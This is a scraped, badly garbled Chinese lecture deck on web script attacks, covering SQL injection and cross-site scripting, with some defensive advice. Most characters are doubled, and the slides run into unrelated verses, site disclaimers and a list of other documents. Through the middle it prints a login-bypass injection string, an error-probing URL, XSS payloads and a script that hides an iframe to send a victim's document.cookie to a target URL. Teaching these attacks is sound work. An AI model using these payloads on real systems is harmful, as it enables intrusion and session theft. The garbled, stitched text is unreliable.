客客戶端界界面自動(dòng)更新新:即無(wú)無(wú)須手動(dòng)動(dòng)地更新新HTML文檔,便便會(huì)自動(dòng)動(dòng)生成新新的頁(yè)面面,可以以大大節(jié)節(jié)省工作作量因時(shí)因人人而變::即當(dāng)不不同的時(shí)時(shí)間、不不同的人人訪問(wèn)同同一網(wǎng)址址時(shí)會(huì)產(chǎn)產(chǎn)生不同同的頁(yè)面面81腳本分類類靜態(tài)腳本本HTML動(dòng)態(tài)腳本本aspphpjspvbs…82SQL注入SQL注入(SQLInjection):程序序員在編編寫(xiě)代碼碼的時(shí)候候,沒(méi)有有對(duì)用戶戶輸入數(shù)數(shù)據(jù)的合合法性進(jìn)進(jìn)行判斷斷,使應(yīng)應(yīng)用程序序存在安安全隱患患。用戶戶可以提提交一段段數(shù)據(jù)庫(kù)庫(kù)查詢代代碼,根根據(jù)程序序返回的的結(jié)果,,獲得某某些他想想得知的的數(shù)據(jù)或或進(jìn)行數(shù)數(shù)據(jù)庫(kù)操操作操作系統(tǒng)Web應(yīng)用數(shù)據(jù)庫(kù)服務(wù)器123調(diào)用數(shù)據(jù)庫(kù)查詢直接調(diào)用操作系統(tǒng)命令通過(guò)數(shù)據(jù)庫(kù)調(diào)用操作系統(tǒng)命令83SQL注入基礎(chǔ)礎(chǔ)知識(shí)SQL(StructuredQueryLanguage):結(jié)構(gòu)化化的查詢?cè)冋Z(yǔ)言,,是關(guān)系系型數(shù)據(jù)據(jù)庫(kù)通訊訊的標(biāo)準(zhǔn)準(zhǔn)語(yǔ)言。。查詢:Selectstatementfromtablewherecondition刪除記錄錄:deletefromtablewherecondition更新記錄錄:updatetablesetfield=valuewherecondtion添加記錄錄:insertintotablefieldvalues(values)常用函數(shù)數(shù)Count()Asc(‘nchar’),unicode(‘nchar’)mid(str,n1,n2),substring(str,n1,n2)84SQL注入簡(jiǎn)單單示例Select*fromtablewhereuser=‘a(chǎn)dmin’andpwd=‘SdfG#345!’;adminSdfG#345!85Select*fromtablewhereuser=‘a(chǎn)dmin’andpwd=‘123’or‘1=1’admin123’or‘1=1由于密碼碼的輸入入方式,,使得查查詢語(yǔ)句句返回值值永遠(yuǎn)為為T(mén)rue,因此通通過(guò)驗(yàn)證證SQL注入范例例-收集信息息86http://xx.xxx.xx.xx/playnews.asp?id=772’and‘‘1=1MicrosoftOLEDBProviderforODBCDrivers錯(cuò)誤'80040e14'[Microsoft][ODBCMicrosoftAccessDriver]字符串的的語(yǔ)法錯(cuò)錯(cuò)誤在在查詢表表達(dá)式'id=772''中。/displaynews.asp,行31說(shuō)明:數(shù)據(jù)庫(kù)為為Access程序沒(méi)有有對(duì)于id進(jìn)行過(guò)濾濾數(shù)據(jù)庫(kù)表表中有個(gè)個(gè)字段名名為idSQL注入范例例-操作作數(shù)據(jù)庫(kù)庫(kù)87SQL注入范例例-執(zhí)行行系統(tǒng)命命令8889SQL注入防御御開(kāi)發(fā)時(shí)過(guò)過(guò)濾特殊殊字符:?jiǎn)我?hào)、、雙引號(hào)號(hào)、斜杠杠、反斜斜杠、冒冒號(hào)、空空字符等等的字符符過(guò)濾的對(duì)對(duì)象:用戶的輸輸入提交的URL請(qǐng)求中的的參數(shù)部部分從cookie中得到的的數(shù)據(jù)部署防SQL注入系統(tǒng)統(tǒng)或腳本本跨站腳本本定義跨站腳本本(CSS-CrossSiteScripting)在遠(yuǎn)程Web頁(yè)面的HTML代碼中插插入的具具有惡意意目的的的數(shù)據(jù),,用戶認(rèn)認(rèn)為該頁(yè)頁(yè)面是可可信的,,但是當(dāng)當(dāng)瀏覽器器下載該該頁(yè)面時(shí)時(shí),嵌入入其中的的腳本將將被解釋釋執(zhí)行跨站腳本本成因CGI程序沒(méi)有有對(duì)用戶戶提交的的變量中中的HTML代碼進(jìn)行行過(guò)濾或或轉(zhuǎn)換。。這種攻擊擊利用的的是用戶戶和服務(wù)務(wù)器之間間的信任任關(guān)系,,以及Web站點(diǎn)沒(méi)有有使用有有效的輸輸入輸出出驗(yàn)證來(lái)來(lái)拒絕嵌嵌入的腳腳本。90跨站腳本本危害1.獲取取其他用用戶Cookie中的敏感感數(shù)據(jù)2.屏蔽蔽頁(yè)面特特定信息息3.偽造造頁(yè)面信信息4.拒絕絕服務(wù)攻攻擊5.突破破外網(wǎng)內(nèi)內(nèi)網(wǎng)不同同安全設(shè)設(shè)置6.與其其它漏洞洞結(jié)合7.其它它91跨站腳本本范例-執(zhí)行Javascript有很多種種方式可可造成Javascript的執(zhí)行,,以下舉舉例兩種種最原始的的范例如如下:第二種方方式,利利用expression指令來(lái)造造成javascript執(zhí)行,范范例如下下:92body{background-image:url("javascript:alert('XSS')");}body{background-image:expression(alert("XSS"));}跨站腳本本危害范范例-Cookies竊取93Web服務(wù)器URL大小為0的iframe將字符編編碼傳送送varcode;vartarget="/?";info=escape(document.cookie);target=target+info;code="<iframestyle='display:none;'src=";code=code+target;code=code+"width=0height=0></iframe>";document.write(code);跨站腳本本危害-竊取Cookies更改Cookies成功獲取取身份94小結(jié)腳本攻擊擊從本質(zhì)質(zhì)上是一一種過(guò)濾濾不足造造成的攻攻擊腳本是不不需要編編譯的程程序代碼碼,依賴賴腳本引引擎來(lái)解解釋執(zhí)行行,具有有很好的的操作系系統(tǒng)適應(yīng)應(yīng)性和可可移植性性如果不可可信的內(nèi)內(nèi)容被引引入到動(dòng)動(dòng)態(tài)頁(yè)面面中,則則無(wú)論是是網(wǎng)站還還是客戶戶機(jī)都沒(méi)沒(méi)有足夠夠的信息息識(shí)別這這種情況況的發(fā)生生并采取取保護(hù)措措施腳本攻擊擊方法主主要包括括:SQL注入攻擊擊、命令令注入、、跨站腳腳本攻擊擊等95謝謝,請(qǐng)請(qǐng)?zhí)釂?wèn)題題!9、靜夜四無(wú)鄰鄰,荒居舊業(yè)業(yè)貧。。12月-2212月-22Thursday,December29,202210、雨中中黃葉葉樹(shù),,燈下下白頭頭人。。。12:33:0112:33:0112:3312/29/202212:33:01PM11、以我獨(dú)獨(dú)沈久,,愧君相相見(jiàn)頻。。。12月-2212:33:0212:33Dec-2229-Dec-2212、故人人江海海別,,幾度度隔山山川。。。12:33:0212:33:0212:33Thursday,December29,202213、乍見(jiàn)見(jiàn)翻疑疑夢(mèng),,相悲悲各問(wèn)問(wèn)年。。。12月月-2212月月-2212:33:0212:33:02December29,202214、他鄉(xiāng)生白發(fā)發(fā),舊國(guó)見(jiàn)青青山。。29十二月月202212:33:02下下午午12:33:0212月月-2215、比不了了得就不不比,得得不到的的就不要要。。。十二月2212:33下下午12月-2212:33December29,202216、行動(dòng)出成果果,工作出財(cái)財(cái)富。。2022/12/2912:33:0212:33:0229December202217、做
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025-2030年中國(guó)除塵設(shè)備產(chǎn)業(yè)運(yùn)營(yíng)狀況與發(fā)展?jié)摿Ψ治鰣?bào)告
- 2025-2030年中國(guó)鉛白市場(chǎng)發(fā)展現(xiàn)狀及前景趨勢(shì)分析報(bào)告
- 2025-2030年中國(guó)鎢鐵行業(yè)發(fā)展現(xiàn)狀及前景趨勢(shì)分析報(bào)告
- 2025-2030年中國(guó)轎車(chē)懸架彈簧轎行業(yè)發(fā)展?fàn)顩r及前景趨勢(shì)分析報(bào)告
- 2025-2030年中國(guó)葡萄糖酸鈣市場(chǎng)競(jìng)爭(zhēng)狀況及投資趨勢(shì)分析報(bào)告
- 2025-2030年中國(guó)色選機(jī)市場(chǎng)競(jìng)爭(zhēng)格局及發(fā)展趨勢(shì)分析報(bào)告
- 2025-2030年中國(guó)紡織品直噴墨水行業(yè)發(fā)展趨勢(shì)與十三五規(guī)劃研究報(bào)告
- 2025-2030年中國(guó)立磨市場(chǎng)運(yùn)行態(tài)勢(shì)及投資戰(zhàn)略研究報(bào)告
- 2025-2030年中國(guó)硫磺回收市場(chǎng)運(yùn)行狀況及發(fā)展趨勢(shì)預(yù)測(cè)報(bào)告
- 2025-2030年中國(guó)石蠟行業(yè)市場(chǎng)運(yùn)行狀況及發(fā)展策略分析報(bào)告
- 初中物理競(jìng)賽及自主招生講義:第7講 密度、壓強(qiáng)與浮力(共5節(jié))含解析
- 2024-2025學(xué)年重慶市渝中區(qū)四年級(jí)(上)期末數(shù)學(xué)試卷
- 2025年人教版中考英語(yǔ)一輪復(fù)習(xí):七年級(jí)下冊(cè)考點(diǎn)測(cè)試卷(含答案)
- 三年級(jí)體育下冊(cè)全冊(cè)教案
- 2024年八年級(jí)語(yǔ)文下冊(cè)《經(jīng)典常談》第一章《說(shuō)文解字》練習(xí)題卷附答案
- (研究生)商業(yè)倫理與會(huì)計(jì)職業(yè)道德ppt教學(xué)課件(完整版)
- 三年級(jí)數(shù)學(xué)下冊(cè)單元計(jì)劃【9個(gè)單元全】
- 火力發(fā)電廠水汽化學(xué)監(jiān)督導(dǎo)則
- 二年級(jí)科學(xué)上冊(cè)期末考試質(zhì)量分析
- 相聲《治病》
- 行動(dòng)學(xué)習(xí)-組織能力提升新境界培訓(xùn)課件.ppt
評(píng)論
0/150
提交評(píng)論